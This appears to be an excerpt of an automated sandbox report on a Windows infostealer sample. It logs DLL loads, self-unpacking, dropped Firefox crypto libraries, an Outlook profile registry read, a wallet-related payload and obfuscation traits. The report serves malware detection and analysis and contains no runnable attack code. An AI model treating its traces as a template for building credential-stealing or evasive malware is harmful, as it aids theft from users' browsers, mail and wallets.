Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: version.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: hlyG1m5UmO.exe Static file information: File size 1162094 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: hlyG1m5UmO.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
Source: Binary string: nss3.pdb@ source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
Source: Binary string: C:\Users\Administrator\Desktop\net8.0-windows7.0\Data\src\WalletsUpdater\WalletsUpdater\obj\Release\WalletsUpdater.pdb source: LocalCGIDAAAKJJ.exe, 0000002B.00000000.3327544133.0000000000812000.00000002.00000001.01000000.0000000E.sdmp, seed[1].exe.16.dr, LocalCGIDAAAKJJ.exe.16.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.16.dr, softokn3.dll.16.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr, vcruntime140[1].dll.16.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr, msvcp140[1].dll.16.dr
Source: Binary string: nss3.pdb source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
Source: Binary string: mozglue.pdb source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.16.dr, softokn3.dll.16.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Unpacked PE file: 16.2.1248.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.biwapeh:W;.tls:W;.mim:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Unpacked PE file: 16.2.1248.tmp.exe.400000.0.unpack
Binary contains a suspicious time stamp
Source: seed[1].exe.16.dr Static PE information: 0xF32C30E9 [Mon Apr 13 10:33:13 2099 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
PE file contains sections with non-standard names
Source: ScreenUpdateSync[1].exe.15.dr Static PE information: section name: .biwapeh
Source: ScreenUpdateSync[1].exe.15.dr Static PE information: section name: .mim
Source: 1248.tmp.exe.15.dr Static PE information: section name: .biwapeh
Source: 1248.tmp.exe.15.dr Static PE information: section name: .mim
Source: freebl3.dll.16.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.16.dr Static PE information: section name: .00cfg
Source: mozglue.dll.16.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.16.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.16.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.16.dr Static PE information: section name: .didat
Source: nss3.dll.16.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.16.dr Static PE information: section name: .00cfg
Source: softokn3.dll.16.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.16.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00288B75 push ecx; ret 15_2_00288B88
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004118A6 push ecx; ret 15_2_004118B9
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00410EC3 push ecx; ret 15_2_00410ED6
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0041B035 push ecx; ret 16_2_0041B048
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040020D pushfd ; iretd 16_2_00400211
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C16B536 push ecx; ret 16_2_6C16B549
Source: ScreenUpdateSync[1].exe.15.dr Static PE information: section name: .text entropy: 7.874217140774513
Source: 1248.tmp.exe.15.dr Static PE information: section name: .text entropy: 7.874217140774513

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif File created: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\seed[1].exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002E59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 15_2_002E59B3
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00275EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 15_2_00275EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002833B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_002833B7
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
